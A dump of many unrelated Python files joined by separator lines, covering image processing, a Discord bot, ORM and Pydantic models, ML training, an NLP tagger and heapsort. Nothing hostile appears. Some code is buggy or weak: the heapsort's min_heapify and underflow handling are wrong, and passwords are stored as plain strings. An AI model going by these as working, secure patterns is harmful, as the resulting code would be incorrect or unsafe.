"ntruhps2048677": {"path": "ntruhps2048677", "is_kem": True},
"ntruhps4096821": {"path": "ntruhps4096821", "is_kem": True},
"ntruhrss701": {"path": "ntruhrss701", "is_kem": True},
"saber": {"path": "saber", "is_kem": True},
"dilithium2": {"path": "dilithium2", "is_sign": True},
"dilithium3": {"path": "dilithium3", "is_sign": True},
"dilithium4": {"path": "dilithium4", "is_sign": True},
"falcon_1024": {"path": "falcon-1024", "is_sign": True},
"falcon_512": {"path": "falcon-512", "is_sign": True},
"rainbowIa_classic": {
"path": "rainbowIa-classic",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowIa_cyclic": {
"path": "rainbowIa-cyclic",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowIa_cyclic_compressed": {
"path": "rainbowIa-cyclic-compressed",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowIIIc_classic": {
"path": "rainbowIIIc-classic",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowIIIc_cyclic": {
"path": "rainbowIIIc-cyclic",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowIIIc_cyclic_compressed": {
"path": "rainbowIIIc-cyclic-compressed",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowVc_classic": {
"path": "rainbowVc-classic",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowVc_cyclic": {
"path": "rainbowVc-cyclic",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"rainbowVc_cyclic_compressed": {
"path": "rainbowVc-cyclic-compressed",
"is_sign": True,
"generate_in_threadpool": True,
"sign_in_threadpool": True,
"verify_in_threadpool": True,
},
"sphincs_haraka_128f_robust": {"path": "sphincs-haraka-128f-robust", "is_sign": True},
"sphincs_haraka_128f_simple": {"path": "sphincs-haraka-128f-simple", "is_sign": True},
"sphincs_haraka_128s_robust": {"path": "sphincs-haraka-128s-robust", "is_sign": True},
"sphincs_haraka_128s_simple": {"path": "sphincs-haraka-128s-simple", "is_sign": True},
"sphincs_haraka_192f_robust": {"path": "sphincs-haraka-192f-robust", "is_sign": True},
"sphincs_haraka_192f_simple": {"path": "sphincs-haraka-192f-simple", "is_sign": True},
"sphincs_haraka_192s_robust": {"path": "sphincs-haraka-192s-robust", "is_sign": True},
"sphincs_haraka_192s_simple": {"path": "sphincs-haraka-192s-simple", "is_sign": True},
"sphincs_haraka_256f_robust": {"path": "sphincs-haraka-256f-robust", "is_sign": True},
"sphincs_haraka_256f_simple": {"path": "sphincs-haraka-256f-simple", "is_sign": True},
"sphincs_haraka_256s_robust": {"path": "sphincs-haraka-256s-robust", "is_sign": True},
"sphincs_haraka_256s_simple": {"path": "sphincs-haraka-256s-simple", "is_sign": True},
"sphincs_sha256_128f_robust": {"path": "sphincs-sha256-128f-robust", "is_sign": True},
"sphincs_sha256_128f_simple": {"path": "sphincs-sha256-128f-simple", "is_sign": True},
"sphincs_sha256_128s_robust": {"path": "sphincs-sha256-128s-robust", "is_sign": True},
"sphincs_sha256_128s_simple": {"path": "sphincs-sha256-128s-simple", "is_sign": True},
"sphincs_sha256_192f_robust": {"path": "sphincs-sha256-192f-robust", "is_sign": True},
"sphincs_sha256_192f_simple": {"path": "sphincs-sha256-192f-simple", "is_sign": True},
"sphincs_sha256_192s_robust": {"path": "sphincs-sha256-192s-robust", "is_sign": True},
"sphincs_sha256_192s_simple": {"path": "sphincs-sha256-192s-simple", "is_sign": True},
"sphincs_sha256_256f_robust": {"path": "sphincs-sha256-256f-robust", "is_sign": True},
"sphincs_sha256_256f_simple": {"path": "sphincs-sha256-256f-simple", "is_sign": True},
"sphincs_sha256_256s_robust": {"path": "sphincs-sha256-256s-robust", "is_sign": True},
"sphincs_sha256_256s_simple": {"path": "sphincs-sha256-256s-simple", "is_sign": True},
"sphincs_shake256_128f_robust": {"path": "sphincs-shake256-128f-robust", "is_sign": True},
"sphincs_shake256_128f_simple": {"path": "sphincs-shake256-128f-simple", "is_sign": True},
"sphincs_shake256_128s_robust": {"path": "sphincs-shake256-128s-robust", "is_sign": True},
"sphincs_shake256_128s_simple": {"path": "sphincs-shake256-128s-simple", "is_sign": True},
"sphincs_shake256_192f_robust": {"path": "sphincs-shake256-192f-robust", "is_sign": True},
"sphincs_shake256_192f_simple": {"path": "sphincs-shake256-192f-simple", "is_sign": True},
"sphincs_shake256_192s_robust": {"path": "sphincs-shake256-192s-robust", "is_sign": True},
"sphincs_shake256_192s_simple": {"path": "sphincs-shake256-192s-simple", "is_sign": True},
"sphincs_shake256_256f_robust": {"path": "sphincs-shake256-256f-robust", "is_sign": True},
"sphincs_shake256_256f_simple": {"path": "sphincs-shake256-256f-simple", "is_sign": True},
"sphincs_shake256_256s_robust": {"path": "sphincs-shake256-256s-robust", "is_sign": True},
"sphincs_shake256_256s_simple": {"path": "sphincs-shake256-256s-simple", "is_sign": True},
}
|
from PIL import Image
import numpy as np
#reading image
img = Image.open('500.png').convert('L')#monocrome
img.save('result21.png')
image_array = np.array(img)
#since image is 255.0 bit, in order to normalize them we have to divide image_array with 255 bit
image_array = image_array / 255.0
print (image_array.shape)
#establishing Kernal and strides
#establish output matrix using (n-f+1) x (n-f+1)
#i.e. n is dimentional, f is kernal size in same direction as dim
Kernel= np.array([[1,0,-1],[2,0,-2],[3,0,-3]])
stride=1
output = np.zeros((498,498))
output1 =np.zeros((498,498))
B0 = image_array[0:3,0:3]
k=0
for i in range(498):
#B = image_array[0:3,0+i:3+i]
for j in range(498):
C = image_array[0+j:3+j,0+i:3+i]
piece_wise = np.multiply(C,Kernel)
output[i,j]=np.sum(piece_wise)
#we are rescalling the image for the final output for convolutional layer
rescaled = (255.0 / output.max() * (output - output.min())).astype(np.uint8)
#image has be transposed so we are using transpose on rescaled image
rescaled = rescaled.T
im=Image.fromarray(rescaled)
im.save('convolutional_output_2.png')
|
# draw lines on a canvas
import numpy as np
import cv2
canvas = np.zeros((300, 400, 3), dtype = "uint8")
green = (0, 255, 0)
red = (0, 0, 255)
cv2.line(canvas, (0, 10), (200, 290), green) # (x1,y1), (x2,y2)
cv2.line(canvas, (190, 290), (390, 10), red, 3)
cv2.imshow("My Art", canvas) # create a single window
cv2.waitKey(0)
cv2.destroyAllWindows() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author: Jan Hybs
from flowrunner.db.mongo import MongoDB
from flowrunner.utils import io, lists
from flowrunner.utils.logger import Logger
from flowrunner.utils.timer import Timer
logger = Logger(__name__)
timer = Timer()
class Experiments(object):
def __init__(self, mongo):
"""
:type mongo: flowrunner.db.mongo.MongoDB
"""
self.mongo = mongo
def insert_one(self, dirname):
with timer.measured('Processing one, folder {dirname}'.format(dirname=dirname), False):
env = self.mongo._extract_environment(io.join_path(dirname, 'environment.json'))
cal = self.mongo._extract_calibration(io.join_path(dirname, 'performance.json'))
env['cal'] = cal
self.mongo.insert_process(dirname, env)
def insert_many(self, dirname, filters=[]):
dirs = io.listdir(dirname)
for f in filters:
dirs = lists.filter(dirs, f)
with timer.measured('Processing many, folder {dirname}'.format(dirname=dirname), False):
for dir in dirs:
self.insert_one(dir)
mongo = MongoDB()
mongo.remove_all()
mongo.close()
mongo = MongoDB()
experiments = Experiments(MongoDB())
# experiments.insert_many('/home/jan-hybs/Dropbox/meta', [lambda x: str(x).startswith('test')])
meta_folder = r'c:\Users\Jan\Dropbox\meta'
experiments.insert_many(io.join_path(meta_folder, 'article', 'A'))
experiments.insert_many(io.join_path(meta_folder, 'article', 'B'))
experiments.insert_many(io.join_path(meta_folder, 'article', 'C'))
# experiments.insert_one('/home/jan-hybs/Dropbox/meta/test-13') |
import os
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
from discord.ext import commands
import difflib
from recommendationKNN import predict_score
import json
knn_recommendations=json.load(open('KNN_recommendation.json'))
movies = pd.read_csv('movie recommendations/processedfinalfile.csv')
bot = commands.Bot(command_prefix='!')
@bot.event
async def on_ready():
print(f'{bot.user.name} has connected to Discord!')
@bot.command()
async def recommend_KNN(ctx,*args):
print(ctx.author.id)
moviename = ' '.join(args)
print(f"User: {ctx.author.name}\nGuild: {ctx.guild}\nMovie: {moviename}\nType: Title")
await ctx.reply(f"Trying to look up the movie")
print(f"Searched term : {moviename}")
if moviename not in movies['original_title']:
probable_movie_list=difflib.get_close_matches(moviename,movies['original_title'])
print(probable_movie_list)
await ctx.reply("**Is the movie you wanted in one of these?**\nIf yes copy paste and use the command with this again\n"+'\n'.join(probable_movie_list))
else:
await ctx.channel.send("Is the movie you are searching for ? ")
await ctx.send(moviename)
print("search begins")
await ctx.send('\n\n\n\n'+ predict_score(moviename) + '\n\n\n\n')
print("search complete")
@bot.command()
async def rKNN(ctx,*args):
print(ctx.author.id)
moviename = ' '.join(args)
print(f"User: {ctx.author.name}\nGuild: {ctx.guild}\nMovie: {moviename}\nType: Title")
await ctx.reply(f"Trying to look up the movie")
print(f"Searched term : {moviename}")
if moviename not in movies['original_title'].tolist():
probable_movie_list=difflib.get_close_matches(moviename,movies['original_title'])
print(probable_movie_list)
await ctx.reply("**Is the movie you wanted in one of these?**\nIf yes copy paste and use the command with this again\n"+'\n'.join(probable_movie_list))
else:
await ctx.channel.send("Is the movie you are searching for ? ")
await ctx.send(moviename)
print("search begins")
await ctx.send('\n\n\n\n'+ predict_score(moviename) + '\n\n\n\n')
print("search complete")
@bot.command()
async def rKNN_indexed(ctx,*args):
print(ctx.author.id)
moviename = ' '.join(args)
print(f"User: {ctx.author.name}\nGuild: {ctx.guild}\nMovie: {moviename}\nType: Title")
await ctx.reply(f"Trying to look up the movie")
print(f"Searched term : {moviename}")
if moviename not in knn_recommendations.keys():
probable_movie_list=difflib.get_close_matches(moviename,knn_recommendations.keys())
print(probable_movie_list)
await ctx.reply("**Is the movie you wanted in one of these?**\nIf yes copy paste and use the command with this again\n"+'\n'.join(probable_movie_list))
else:
await ctx.channel.send("Is the movie you are searching for ? ")
await ctx.send(moviename)
outputtext='Here are the recommendations :'
movielist=knn_recommendations[moviename]
for nameofmovie in movielist:
outputtext=outputtext+'\n' + nameofmovie
print("search begins")
await ctx.send('\n\n\n\n'+ outputtext + '\n\n\n\n')
print("search complete")
TOKEN = os.environ['DISCORD_BOT_SECRET']
bot.run(TOKEN)
|
from app import db
class News(db.Model):
"""The basic data for news items"""
__tablename__ = "News"
NewsID = db.Column(db.Integer, primary_key=True)
Title = db.Column(db.String(255), nullable=False)
Contents = db.Column(db.Text, nullable=False)
Author = db.Column(db.String(255), nullable=False)
Created = db.Column(db.DateTime, nullable=False)
Updated = db.Column(db.DateTime)
class NewsCategories(db.Model):
"""Defines the display values for categories that can be selected for news."""
__tablename__ = "NewsCategories"
NewsCategoryID = db.Column(db.Integer, primary_key=True)
Category = db.Column(db.String(255), nullable=False)
class NewsCategoriesMapping(db.Model):
"""The mapping between News items and NewsCategories"""
__tablename__ = "NewsCategoriesMapping"
NewsCategoriesMappingID = db.Column(db.Integer, primary_key=True)
NewsID = db.Column(
db.Integer, db.ForeignKey("News.NewsID", ondelete="CASCADE"), nullable=False
)
NewsCategoryID = db.Column(db.Integer, nullable=False)
|
# create pydantic model
# Pydantic also uses the term "model" to refer to something different,
# the data validation, conversion, and documentation classes and instances
# Pydantic models (schemas) that will be used when reading data, when returning it from the API.
from typing import List,Optional
# BaseModel , pydantic provides a dataclass decorator which creates (almost) vanilla python dataclasses with input data parsing and validation.
from pydantic import BaseModel
class BlogBase(BaseModel):
titel:str
body:str
catagory:str
class Blog(BlogBase):
class Config():
orm_mode=True
# Pydantic's orm_mode will tell the Pydantic model to read the data even
# if it is not a dict, but an ORM model (or any other arbitrary object with attributes)
class User(BaseModel):
name:str
email:str
password:str
class Config():
orm_mode=True
class ShowUser(BaseModel):
name:str
email:str
blogs:List[Blog]=[]
class Config():
orm_mode=True
class ShowBlog(BaseModel):
# titel:str
# body:str
# catagory:str
creator:ShowUser
class Config():
orm_mode=True
class Token(BaseModel):
access_token:str
token_type:str
class TokenData(BaseModel):
email:Optional[str]=None
class UseInDB(User):
hashed_password:str
class UserCreate(User):
password:str
class createcode(BaseModel):
# name:str
code:str
password:str
class LogConfig(BaseModel):
"""Logging configuration to be set for the server"""
LOGGER_NAME: str = "mycoolapp"
LOG_FORMAT: str = "%(levelprefix)s | %(asctime)s | %(message)s"
LOG_LEVEL: str = "DEBUG"
log_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"default": {
"()": "uvicorn.logging.DefaultFormatter",
"fmt": "%(levelprefix)s %(asctime)s %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
},
"handlers": {
"default": {
"formatter": "default",
"class": "logging.StreamHandler",
"stream": "ext://sys.stderr",
},
},
"loggers": {
"foo-logger": {"handlers": ["default"], "level": "DEBUG"},
},
} |
"""
Demo by G. Brammer
"""
import numpy as np
from voronoi import bin2d
import matplotlib.pyplot as plt
# Noisy gaussian
yp, xp = np.indices((100,100))
R = np.sqrt((xp-50)**2+(yp-50)**2)
sigma = 10
g = 10*np.exp(-R**2/2/sigma**2)
s = 1
noise = np.random.normal(size=R.shape)*s
pix_bin, bin_x, bin_y, bin_sn, bin_npix, scale = bin2d.bin2d(xp.flatten(), yp.flatten(), (g+noise).flatten(), g.flatten()*0+s, 20., cvt=True, wvt=False, graphs=False, quiet=False)
# Bin stats
bad = bin_sn < 5
masked = pix_bin*1
mean_bins = pix_bin*0.
median_bins = pix_bin*0.
mea = bin_x*0.
med = bin_x*0.
bx = bin_x*0.
by = bin_y*0.
bin_ids = np.unique(pix_bin)
for i in range(len(bin_ids)):
bin_mask = pix_bin == bin_ids[i]
mea[i] = (g+noise).flatten()[bin_mask].mean()
mean_bins[bin_mask] = mea[i]
med[i] = np.median((g+noise).flatten()[bin_mask])
median_bins[bin_mask] = med[i]
bx[i] = np.sum(xp.flatten()*bin_mask)/bin_mask.sum()
by[i] = np.sum(yp.flatten()*bin_mask)/bin_mask.sum()
for bin in np.where(bad)[0]:
bin_mask = pix_bin == bin
masked[bin_mask] = -99
# Plot
plt.rcParams['image.origin'] = 'lower'
fig = plt.figure(figsize=[9, 2.8])
ax = fig.add_subplot(131)
ax.imshow(pix_bin.reshape(R.shape))
ax.scatter(bin_x, bin_y, marker='.', color='k', alpha=0.1)
ax = fig.add_subplot(132)
ax.imshow(g+noise, vmin=-0.1, vmax=10, cmap='gray_r')
ax = fig.add_subplot(133)
ax.imshow(median_bins.reshape(R.shape), vmin=-0.1, vmax=10, cmap='gray_r')
for ax in fig.axes:
ax.set_xticklabels([]); ax.set_yticklabels([])
fig.tight_layout(pad=0.1)
fig.savefig('test.png')
|
import matplotlib.pyplot as plt
from matplotlib import pyplot
import matplotlib as mpl
import numpy as np
import pandas as pd
import colormaps as cmaps
plt.register_cmap(name='viridis', cmap=cmaps.viridis)
plt.set_cmap(cmaps.viridis)
# Make a figure and axes with dimensions as desired.
fig, ax = plt.subplots(figsize=[1, 10])
# Set the colormap and norm to correspond to the data for which
# the colorbar will be used.
norm = mpl.colors.Normalize(vmin=0, vmax=1)
# ColorbarBase derives from ScalarMappable and puts a colorbar
# in a specified axes, so it has everything needed for a
# standalone colorbar. There are many more kwargs, but the
# following gives a basic continuous colorbar with ticks
# and labels.
bounds = [0, 1]
cb1 = mpl.colorbar.ColorbarBase(ax,
norm=norm,
ticks=bounds,
orientation='vertical')
plt.tight_layout()
for item in [fig, ax]:
item.patch.set_visible(False)
plt.savefig('colormap.png', format='png', dpi=900)
plt.show() |
# Generated by Django 2.2.4 on 2019-08-23 03:00
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Carousel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=20, verbose_name='滚动字幕')),
('color', models.CharField(max_length=20, verbose_name='字体颜色')),
],
options={
'verbose_name': '轮播表',
},
),
migrations.CreateModel(
name='Menu',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=20, verbose_name='小说分类')),
],
options={
'verbose_name': '标题表',
},
),
migrations.CreateModel(
name='NovelUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pen_name', models.CharField(max_length=16, verbose_name='笔名/用户名')),
('password', models.CharField(max_length=20)),
('name', models.CharField(max_length=12, verbose_name='真实姓名')),
('email', models.CharField(max_length=20, null=True)),
],
options={
'verbose_name': '用户表',
},
),
migrations.CreateModel(
name='Novel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=20, verbose_name='标题')),
('content', models.TextField(max_length=65530, verbose_name='正文')),
('create_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='创作时间')),
('read_times', models.IntegerField(default=0, verbose_name='阅读次数')),
('level', models.IntegerField(verbose_name='小说等级,对2求余分5等')),
('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Novel.Menu', verbose_name='关联大分类标题')),
('novel_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Novel.NovelUser', verbose_name='关联用户')),
],
options={
'verbose_name': '小说表',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=200, verbose_name='评论内容')),
('novel', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Novel.Novel', verbose_name='关联小说')),
('novel_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Novel.NovelUser', verbose_name='关联用户')),
],
options={
'verbose_name': '评论表',
},
),
]
|
#!/usr/bin/python
import re
def readNext(file):
tmp = file.readline()
if not tmp:
return ""
tmp = tmp.strip()
while (len(tmp)==0):
tmp = file.readline()
if not tmp:
return ""
else:
tmp = tmp.strip()
return tmp
def readNextWithTag(file, tagName):
tmp = readNext(file)
regex = re.compile(r"%s (.*)" % tagName)
return re.match(regex, tmp).group(1)
def readODName(file):
tmp = readNext(file)
regex = re.compile(r'.*\[ # (.*) flow')
return re.match(regex, tmp).group(1)
def readSP(str):
regex = re.compile(r'.*\[(.*)\].*cost (.*)') # first group is an unformatted list of links in a SP, second is the cost
regex_linkName = re.compile(r'\'(.*)\',*') # used to extract the link name from a string like 'name',
links = re.match(regex, str).group(1)
links = [i for i in links.split()]
linkNames = []
for i in links:
name = re.match(regex_linkName, i).group(1)
linkNames.append(name)
cost = re.match(regex, str).group(2)
list_of_links = ' '.join(linkNames)
return [list_of_links, cost]
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016-2023 PyThaiNLP Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unigram Part-Of-Speech tagger
"""
import json
import os
from typing import List, Tuple
from pythainlp.corpus import corpus_path, get_corpus_path
from pythainlp.tag import blackboard, orchid
_ORCHID_FILENAME = "pos_orchid_unigram.json"
_ORCHID_PATH = os.path.join(corpus_path(), _ORCHID_FILENAME)
_PUD_FILENAME = "pos_ud_unigram-v0.2.json"
_PUD_PATH = os.path.join(corpus_path(), _PUD_FILENAME)
_BLACKBOARD_NAME = "blackboard_unigram_tagger"
_ORCHID_TAGGER = None
_PUD_TAGGER = None
_BLACKBOARD_TAGGER = None
def _orchid_tagger():
global _ORCHID_TAGGER
if not _ORCHID_TAGGER:
with open(_ORCHID_PATH, encoding="utf-8-sig") as fh:
_ORCHID_TAGGER = json.load(fh)
return _ORCHID_TAGGER
def _pud_tagger():
global _PUD_TAGGER
if not _PUD_TAGGER:
with open(_PUD_PATH, encoding="utf-8-sig") as fh:
_PUD_TAGGER = json.load(fh)
return _PUD_TAGGER
def _blackboard_tagger():
global _BLACKBOARD_TAGGER
if not _BLACKBOARD_TAGGER:
path = get_corpus_path(_BLACKBOARD_NAME)
with open(path, encoding="utf-8-sig") as fh:
_BLACKBOARD_TAGGER = json.load(fh)
return _BLACKBOARD_TAGGER
def _find_tag(
words: List[str], dictdata: dict, default_tag: str = ""
) -> List[Tuple[str, str]]:
keys = list(dictdata.keys())
return [
(word, dictdata[word]) if word in keys else (word, default_tag)
for word in words
]
def tag(words: List[str], corpus: str = "pud") -> List[Tuple[str, str]]:
"""
:param list words: a list of tokenized words
:param str corpus: corpus name (orchid or pud)
:return: a list of tuples (word, POS tag)
:rtype: list[tuple[str, str]]
"""
if not words:
return []
to_ud = False
if corpus[-3:] == "_ud":
to_ud = True
word_tags = []
if corpus == "orchid" or corpus == "orchid_ud":
words = orchid.pre_process(words)
word_tags = _find_tag(words, _orchid_tagger())
word_tags = orchid.post_process(word_tags, to_ud)
elif corpus == "blackboard" or corpus == "blackboard_ud":
words = blackboard.pre_process(words)
word_tags = _find_tag(words, _blackboard_tagger())
word_tags = blackboard.post_process(word_tags, to_ud)
else: # default, use "pud" as a corpus
word_tags = _find_tag(words, _pud_tagger())
return word_tags
|
import numpy as np
import datetime
import pandas as pd
from tqdm import tqdm
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import model_opt
import algo_GD
import helper
import noise
if __name__ == "__main__":
args = sys.argv
t = int(args[1])
w_init = np.array([3, 3])
_t_max = 1000
f = model_opt.RosenBrock()
w_star = f.w_star
last_w_store = []
iqr_store = []
for i in tqdm(range(t)):
#var = np.random.randint(1,300,1)[0]
var = 55 # iqr 70~80
noise_data = noise.Gauss(mean=0, sigma=var, dim=2, n=_t_max).generate()
iqr = helper.iqr(noise_data)
algo = algo_GD.SGD(w_init=w_init, t_max=_t_max, a=0.00078)
for i in algo:
noise_value = noise_data[algo.t - 1]
f = model_opt.RosenBrock(noise_value=noise_value)
algo.update(model=f)
last_w_store.append(algo.w)
iqr_store.append(iqr)
dt_now = datetime.datetime.now()
last_w_store = np.array(last_w_store)
data = np.array([iqr_store,last_w_store[:,0],last_w_store[:,1]]).T
df = pd.DataFrame(data=data, columns=['iqr', 'w_0', 'w_1'])
df.to_csv('gauss_noise/gauss_noise_last_w{}.csv'.format(dt_now),header=True)
|
import sys
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from sklearn.metrics import confusion_matrix
from utils import set_random_seed, get_minibatches_idx, get_weighted_minibatches_idx
from models import ResNet18, VGG
from data import save_train_data, save_test_data, load_data_from_pickle
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.set_default_tensor_type('torch.cuda.FloatTensor')
def build_model(config):
if config['model'] == 'ResNet18':
model = ResNet18(color_channel=config['color_channel'])
elif config['model'] == 'VGG11':
model = VGG('VGG11', color_channel=config['color_channel'])
elif config['model'] == 'VGG13':
model = VGG('VGG13', color_channel=config['color_channel'])
else:
print('wrong model option')
model = None
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=config['lr'], momentum=config['momentum'],
weight_decay=config['weight_decay'])
return model, loss_function, optimizer
def get_weighted_idx(trainloader, config):
weighted_idx = []
for x in range(len(trainloader)):
label_id = int(trainloader[x][1][0].item())
if label_id >= config['t1']:
weighted_idx.append(x)
return weighted_idx
def simple_train_batch(trainloader, model, loss_function, optimizer, config):
print('weighted idx', config['weighted_idx'])
model.train()
for epoch in range(config['epoch_num']):
if epoch == int(config['epoch_num'] / 3):
for g in optimizer.param_groups:
g['lr'] = config['lr'] / 10
print('divide current learning rate by 10')
elif epoch == int(config['epoch_num'] * 2 / 3):
for g in optimizer.param_groups:
g['lr'] = config['lr'] / 100
print('divide current learning rate by 10')
total_loss = 0
minibatches_idx = get_weighted_minibatches_idx(len(trainloader), config['simple_train_batch_size'],
config['weighted_idx'], config['weight_ratio'], shuffle=True)
for minibatch in minibatches_idx:
inputs = torch.Tensor(np.array([list(trainloader[x][0].cpu().numpy()) for x in minibatch]))
targets = torch.Tensor(np.array([list(trainloader[x][1].cpu().numpy()) for x in minibatch]))
inputs, targets = Variable(inputs.cuda()).squeeze(1), Variable(targets.long().cuda()).squeeze()
optimizer.zero_grad()
outputs = model(inputs).squeeze()
loss = loss_function(outputs, targets)
total_loss += loss
loss.backward()
optimizer.step()
print('epoch:', epoch, 'loss:', total_loss)
def simple_test_batch(testloader, model, config):
model.eval()
total = 0.0
correct = 0.0
minibatches_idx = get_minibatches_idx(len(testloader), minibatch_size=config['simple_test_batch_size'],
shuffle=False)
y_true = []
y_pred = []
for minibatch in minibatches_idx:
inputs = torch.Tensor(np.array([list(testloader[x][0].cpu().numpy()) for x in minibatch]))
targets = torch.Tensor(np.array([list(testloader[x][1].cpu().numpy()) for x in minibatch]))
inputs, targets = Variable(inputs.cuda()).squeeze(1), Variable(targets.cuda()).squeeze()
outputs = model(inputs)
_, predicted = torch.max(outputs, 1)
total += targets.size(0)
correct += predicted.eq(targets.long()).sum().item()
y_true.extend(targets.cpu().data.numpy().tolist())
y_pred.extend(predicted.cpu().data.numpy().tolist())
test_accuracy = correct / total
test_confusion_matrix = confusion_matrix(y_true, y_pred)
t1 = config['t1']
big_class_acc = np.sum([test_confusion_matrix[i, i] for i in range(t1)]) / np.sum(test_confusion_matrix[:t1])
if t1 == 10:
small_class_acc = None
else:
small_class_acc = \
np.sum([test_confusion_matrix[i, i] for i in range(10)[t1:]]) / np.sum(test_confusion_matrix[t1:])
return test_accuracy, big_class_acc, small_class_acc, test_confusion_matrix
def run_train_models():
data_option = sys.argv[1].split('=')[1]
model_option = sys.argv[2].split('=')[1]
t1 = int(sys.argv[3].split('=')[1])
R = sys.argv[4].split('=')[1]
weight_ratio = int(sys.argv[5].split('=')[1])
print('weight ratio', weight_ratio)
config = {'dir_path': '/path/to/working/dir', 'data': data_option, 'model': model_option,
't1': t1, 'R': R, 'fixed': 'small', 'simple_train_batch_size': 128, 'simple_test_batch_size': 100,
'epoch_num': 350, 'lr': 0.1, 'momentum': 0.9, 'weight_decay': 5e-4, 'weight_ratio': weight_ratio}
# fixed: big/small
if data_option == 'fashion_mnist':
config['color_channel'] = 1
else:
config['color_channel'] = 3
if R == 'inf':
config['big_class_sample_size'] = 5000
config['small_class_sample_size'] = 0
else:
R = int(R)
if data_option == 'cifar10':
config['big_class_sample_size'] = 5 * R
config['small_class_sample_size'] = 5
elif data_option == 'fashion_mnist':
config['big_class_sample_size'] = 6 * R
config['small_class_sample_size'] = 6
else:
print('wrong data option')
model_path = config['dir_path'] + '/models/' + config['data'] + '_' + config['model'] + '_t1=' + \
str(config['t1']) + '_R=' + config['R'] + '_' + config['fixed'] + '_' + str(config['weight_ratio']) \
+ '.pt'
print('save test data')
set_random_seed(666)
save_test_data(config)
print('save train data')
set_random_seed(666)
save_train_data(config)
set_random_seed(666)
print('load data from pickle')
train_data, test_data = load_data_from_pickle(config)
weighted_idx = get_weighted_idx(train_data, config)
config['weighted_idx'] = weighted_idx
print('weighted idx', weighted_idx)
print('build model')
model, loss_function, optimizer = build_model(config)
print('train model')
simple_train_batch(train_data, model, loss_function, optimizer, config)
print('save model')
torch.save(model.state_dict(), model_path)
print('load model')
model.load_state_dict(torch.load(model_path))
train_res, train_big, train_small, train_confusion_matrix = simple_test_batch(train_data, model, config)
test_res, test_big, test_small, test_confusion_matrix = simple_test_batch(test_data, model, config)
print('train accuracy', train_res, train_big, train_small)
print('test accuracy', test_res, test_big, test_small)
print('train confusion matrix\n', train_confusion_matrix)
print('test confusion matrix\n', test_confusion_matrix)
if __name__ == '__main__':
run_train_models()
|
#Heapsort
#15.7.20
#chuanlu
import math
def right(i):
return 2*(i+1)
def left(i):
return 2*i+1
def parent(i):
return math.floor(i/2)
def heapsize(A):
return len(A) - 1 #我们认为堆A的有效元素个数和数组A的长度相等
def max_heapify(A ,i, x):
l = left(i)
r = right(i)
A_heapsize = x
largest = 0
if l < A_heapsize and A[l] > A[i]:
largest = l
else:
largest = i
if r < A_heapsize and A[r] > A[largest]:
largest = r
if largest != i:
A[i], A[largest] = A[largest], A[i]
max_heapify(A, largest, A_heapsize)
return A
def min_heapify(A ,i, x):
l = left(i)
r = right(i)
A_heapsize = x
smallest = ''
if l <= A_heapsize and A[l] > A[i]:
smallest = l
else:
smallest = i
if r <= A_heapsize and A[r] > A[smallest]:
smallest = r
if smallest != i:
A[i], A[smallest] = A[smallest], A[i]
max_heapify(A, smallest)
return A
def build_max_heap(A, A_heapsize):
for i in range(math.floor((len(A))/2), -1, -1):
max_heapify(A, i, A_heapsize)
return A
def heap_sort(A, A_heapsize):
build_max_heap(A, A_heapsize)
print(A)
for i in range(len(A) - 1, 0, -1):
A[0], A[i] = A[i], A[0]
A_heapsize -= 1
max_heapify(A, 0, A_heapsize)
return A
#Priority Queue
def heap_extract_max(A, A_heapsize):
if A_heapsize < 1:
print('Error: Heap Underflow')
A_max = A[0]
A[0] = A[A_heapsize - 1]
A_heapsize -= 1
max_heapify(A, 0, A_heapsize)
return A_max
def heap_maximum(A):
return A[0]
def heap_increase_key(A, i, key):
if key < A[i]:
print('Error: No key is smaller than current key')
A[i] = key
